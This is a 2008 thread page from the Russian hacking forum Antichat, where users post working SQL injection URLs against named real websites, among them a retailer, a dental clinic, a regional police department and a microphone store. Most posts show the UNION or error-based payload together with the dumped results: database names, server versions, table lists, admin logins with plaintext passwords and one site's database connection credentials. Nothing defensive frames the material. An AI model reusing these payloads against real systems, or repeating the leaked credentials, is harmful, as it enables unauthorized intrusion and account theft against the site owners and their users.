ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5301  
Старый 13.04.2008, 17:21
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию

NISPAcee - The Network of Institutes and Schools of Public Administration in Central and Eastern Europe
Код:
http://www.nispa.sk/_portal/conf_program.php?cid=9999999999999/**/UNION/**/SELECT/**/1/*
The Washington Institute for Near East Policy
Код:
http://www.washingtoninstitute.org/templateC04.php?CID=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49/*

Последний раз редактировалось bag; 13.04.2008 в 17:36..
 
Ответить с цитированием

  #5302  
Старый 13.04.2008, 21:52
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

Центр информационных технологий

http://itex.ru/po/sale/?pid=-4+union+select+1/*
user - itex@cub.mplik.ru
database - itex
version - 5.0.41-log


Интересные таблицы
amarant_users
analitika_hackers
analitika_users
apm_admin
apm_hackers
asbest_users
atmosphere_admin
 
Ответить с цитированием

  #5303  
Старый 14.04.2008, 07:52
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://www.bamba.ru/product.asp?view=56634+or+1=(select+system_user)

http://www.bamba.ru/product.asp?view=56634+or+1=(select+db_name())

http://www.bamba.ru/product.asp?view=56634+or+1=@@version


bd_user: frontcontent


bd_name:bamba

http://www.bamba.ru/product.asp?view=56634+or+1=@@version

version:
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)


-----------------------

http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+table_na me+from+information_schema.tables+where+table_name +not+in+('GROUP_MEMBERSHIP','GROUP_RIGHTS','CONTEN T_5','CONTENT_26','CONTENT_20','SITE','main_catalo g','SYSTEM_VARS','USER_RIGHTS','CONTENT_TYPE','PAG E','ATTRIBUTE_GROUP','ATTRIBUTE_TYPE','BACKEND_SEC TION','catalog','CONTAINER','CONTAINER_TYPE','CONT ENT','CONTENT_1','CONTENT_10','CONTENT_11','CONTEN T_12','CONTENT_13','CONTENT_14','CONTENT_15','CONT ENT_16','CONTENT_17','CONTENT_18','CONTENT_19','CO NTENT_2','CONTENT_21','CONTENT_22','CONTENT_23','C ONTENT_24','CONTENT_3','CONTENT_4','CONTENT_6','CO NTENT_7','CONTENT_8','CONTENT_9','CONTENT_ATTRIBUT E','CONTENT_DATA','CONTENT_LINK','CONTENT_STATUS', 'CONTENT_TYPE_GROUP','CONTENT_TYPE_LINK','DB_VERSI ON','dtproperties','FORMAT','GROUP_ROLE','LANGUAGE ','MEMBER','MEMBER_CONTENT','OBJECT','ROLE','ROLE_ RIGHTS','SITE_LANG','SITE_SECTIONS','sysconstraint s','syssegments','SYSTEM_VARS_GROUP','t_jiaozhu',' TEMPLATE','UNIT','UNIT_SETTING','USER_GROUP','USER _ROLE'))

получаем таблицу 'USERS'
--------------------------------------
Получаем структуру таблицы users

http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+column_n ame+from+information_schema.columns+where+table_na me='USERS'+and+column_name+not+in+('created','disa bled','full_name','login','modified','password','site_id'))

---------------------------------------

http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users)--

login:MNBorisow
password:ma3569


-------------------------
http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users+where+login+not+in+('MNBorisow') )--

loginVStebunov
pass:12345678


----------------------------------------------------
http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users+where+login+not+in+('MNBorisow', 'DVStebunov'))--


login:yy
pass:moscow1



------------------------------------------------------
http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users+where+login+not+in+('MNBorisow', 'DVStebunov','yy'))--

login:GLazukin
pass:GP97sl




И.Т.Д.
 
Ответить с цитированием

  #5304  
Старый 14.04.2008, 18:05
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

http://nce.iatp.org.ua/index.php?action=events&show=events&id=8+UNION+SEL ECT+1,2,3,4,5,6,concat_ws(char(58),version(),user( ),database())+LIMIT+1,1/*
4.1.22
nce@hosting.iatp.org.ua
nce
 
Ответить с цитированием

  #5305  
Старый 14.04.2008, 22:53
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

Серверное и сетевое оборудование
http://okta.ru/articles/?id=-1204722526+UNION+SELECT+1,concat(user(),0x3a,versi on(),0x3a,database()),3/*
user - okta_admin@localhost
version - 4.0.24_Debian-10sarge2-log
database - okta_admin
 
Ответить с цитированием

  #5306  
Старый 14.04.2008, 23:18
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

стомотология...
Код:
http://www.ctoma.ru/services.phtml?id=-142+union+select+concat(version(),char(58),database(),char(58),user())/*
(см. в <title>5.0.41-log:ctoma:ctoma@localhost)

Последний раз редактировалось Dr.Check; 14.04.2008 в 23:35..
 
Ответить с цитированием

  #5307  
Старый 15.04.2008, 09:28
RuDDicK
Новичок
Регистрация: 06.04.2008
Сообщений: 24
Провел на форуме:
64762

Репутация: -3
По умолчанию

sql inject на дамском клубе
http://www.tdktv.ru/index.php?menu=program&id=- 1+union+select+1,concat(username,char(58),user_pas sword),3+from+phpbb_users+limi
t+1,2
вот данные для коннекта к БД

"dblogin" => "tdktvru_user"
"dbpass" => "markus25let"
"dbhost" => "mysql.nthost.ru"
"dbname" => "tdktvru_common"
 
Ответить с цитированием

  #5308  
Старый 15.04.2008, 09:35
RuDDicK
Новичок
Регистрация: 06.04.2008
Сообщений: 24
Провел на форуме:
64762

Репутация: -3
По умолчанию

sql-injection на Департаменте вн.дел Каз. области
http://kostanaypolice.kz/index.php?id=-1)+union+select+1,user(),3+from+relise/*
 
Ответить с цитированием

  #5309  
Старый 15.04.2008, 16:40
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Таблыцы:

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+table_name+fro m+information_schema.tables+where+table_name+not+i n('MODELS','NEWSLETTER','PAGE_groups','pages','pay ment','address','assets','assets_type','brands','c art','cartitems','category','connector_key','conne ctors','connectors_b3','connectors_b6','connectors _choir','connectors_e6','connectors_emw','connecto rs_headset','connectors_isomax2','contactus','down loads','items','pdfs','pdftoproducts','preferences ','PREFERENCES_SECURE_STYLES','PREFERENCES_SHIPPIN G','PREFtoSHIP_SERVICES','PREFtoSHIP_VENDORS','pri ces','PRODtoCAT','products','promo_codes','SHIPPIN G_SERVICES','SHIPPING_VENDORS','sysconstraints','s yssegments','))--&catid=

ПАЛЯ :Р

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+column_name+fr om+information_schema.columns+where+table_name='us ers'+and+column_name+not+in('Active','Admin','Bill ingAddressID','CompanyName','EndDate','Name','Pass word','PrefID','ShippingAddressID','TheDate','User ID','UserName'))--

Бес понятия, боян или нет, но вот.

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+cast(UserID+as +nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar )%2B%27%3A%27%2Bcast(Admin+as+nvarchar)%2B%27%3A%2 7%2Bcast(name+as+nvarchar)+from+users+where+UserID =1)--v



Остальное влом :Р, спасибо Анатолию за стотью:-Р
 
Ответить с цитированием

  #5310  
Старый 15.04.2008, 17:02
RuDDicK
Новичок
Регистрация: 06.04.2008
Сообщений: 24
Провел на форуме:
64762

Репутация: -3
По умолчанию

Бес понятия, боян или нет, но вот.

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+cast(UserID+as +nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar )%2B%27%3A%27%2Bcast(Admin+as+nvarchar)%2B%27%3A%2 7%2Bcast(name+as+nvarchar)+from+users+where+UserID =1)--v



Остальное влом :Р, спасибо Анатолию за стотью:-Р[/QUOTE]
http://www.countryman.com/store/product.asp?id=1+or+1
тот же самый результат
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 14 (пользователей: 0 , гостей: 14)
 


Быстрый переход




ANTICHAT.XYZ